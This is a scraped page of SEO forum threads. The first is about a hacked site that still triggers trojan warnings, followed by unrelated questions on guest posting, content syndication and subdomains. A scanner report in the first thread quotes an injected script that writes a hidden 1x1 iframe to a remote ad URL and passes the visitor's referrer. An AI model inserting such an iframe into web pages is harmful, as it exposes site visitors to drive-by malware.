Users reporting that there is a virus on my site.
-
A few months ago I found out that someone had hacked my site and placed malicious code and modified my .htaccess. I am pretty certain that I have cleared up all of the bad code (within 12 hours of it being infected). Yet, I am getting people telling me that their virus checker is warning them of a trojan on my site.
Is there anything that can be done?
I have no malware warnings in my Webmaster Tools.
The site currently has 2 articles that are going viral and I'd hate for that to be screwed up by a stupid virus!

Thanks guys. The site does have 2 wordpress blogs, but the warnings are coming from hard coded (by me) static pages.
sitecheck.sucuri.net gave me this warning when my site was scanned:
****Known javascript malware.
Details: ****http://sucuri.net/malware/malware-entry-mwiframehd20<scriptlanguage=javascript>document.write(<iframesrc=http: frankwsgoldie.in="" showads.php?2&seoref="encodeURIComponent(document.referrer)&HTTP_REFERER=encodeURIComponent(document.URL)width=1height=1frameborder=0">);</iframesrc=http:></scriptlanguage=javascript>
I can't see that code anywhere on my site!

I think that may be because IE does a much better job and detecting these things.
Let me take a guess, this site is a wordpress site?

Hi Marie,
Good advice from James here.
One other question I would ask - have you checked the site in all browsers? There are viruses written for specific browsers such as IE. I have seen a situation where a site was infected, but nobody in the company knew because they were all using Chrome or Firefox. As soon as a customer hit the site with IE all the flashing lights and sirens went off!
Also, have you asked those reporting a problem for details of the virus scanning software they are using? If you can nail down the virus scanner involved and run an online scan from that company's website you should be able to replicate the report and see what exactly is happening.
Hope that helps,
Sha

Hi,
My advice would be to check the files in your FTP for the specific site, look over your website files too see if any thing should not be in their such as malicious files, directory's which have been made by the hacker. Did you also check if the hacker has made any new pages on the website?
Did you also change all passwords after the site was hacked from the CMS level? Also depending on your CMS you can get plugins to scan for malicious files.I hope this helps.

My Article on External Site
Good Morning, I was recently approached by an influencer in my industry who says that they noticed the quality of the content on my website's blog and they want to know if i would like to write an article for them to publish on their blog. The article will mention my products and how they would be helpful to the readers of this particular blog. I would like for some of you to take a look at the blog in question and tell me if you think this is a high quality blog that is worth me attempting to network with and possibly even obtain a link from. You can view the blog here: http://bit.ly/1JfmuRF I see nothing wrong with creating a brand new, high quality, relevant post and having it published on this blog - but i wanted to hear some of your opinions on these types of things. Thanks

Why do other sites rank higher for our blog content?
Our site has always allowed other sites to RSS feed our content. Recently, we've noticed that searches for a title of our blog post will rank 2 sites that only publish said content, while our links are nowhere to be seen on the SERPs for Google. Is there any way I can fix this or prod Google to adjust it for us? Background: We were ranked highly in many long tail keywords, but lost many of them in June 2013. During this time going forward, we received no manual action.

Filling Up Content For A New News Publishing Site
Hello, SEO Gurus. I have a client whom I've been working with for a few months now, and part of our service offering is to publish and promote fresh, daily content on his site's blog. This strategy has been a huge success thus far, he is very happy with the content, etc. Now, he is getting ready to launch a second site, which will be a news publishing site for his industry niche, and we will once again be providing the content on a daily basis: we're going to be producing 10 to 15 articles a day. It's a big operation for us. The client, however, is concerned that he doesn't want the site to appear "thin" on content in the early going, and asked if it would be possible to populate the new site with the articles we wrote on the other site's blog. My gut reaction to this is that it would be an exceedingly bad idea to do this. While we are the ones who authored the original content (and we've used author tags and publishing markup), the best bet is to simply start fresh. Besides that, seeing as we'll be pumping out tons of content on a daily basis, it won't take long to fill up the content coffers. That being said, I just wanted to run this past you all and see if anyone had any alternative ideas on how to use the old content without it being duplicate content. I was thinking that maybe designating all of the old articles with noindex, nofollow could be an option? Many thanks in advance for your time and attention. Sincerely, Mike

Does a directory running on a subdomain help or hurt SEO on the main site?
I have a blog, with a directory on the subdomain: directory.fbforbusinessmarketing.com. Is that smart for SEO, as it gives the overall domain more traffic? Or bad for SEO because of the different topics and all those outbound links? I'd appreciate opinions. Thanks.
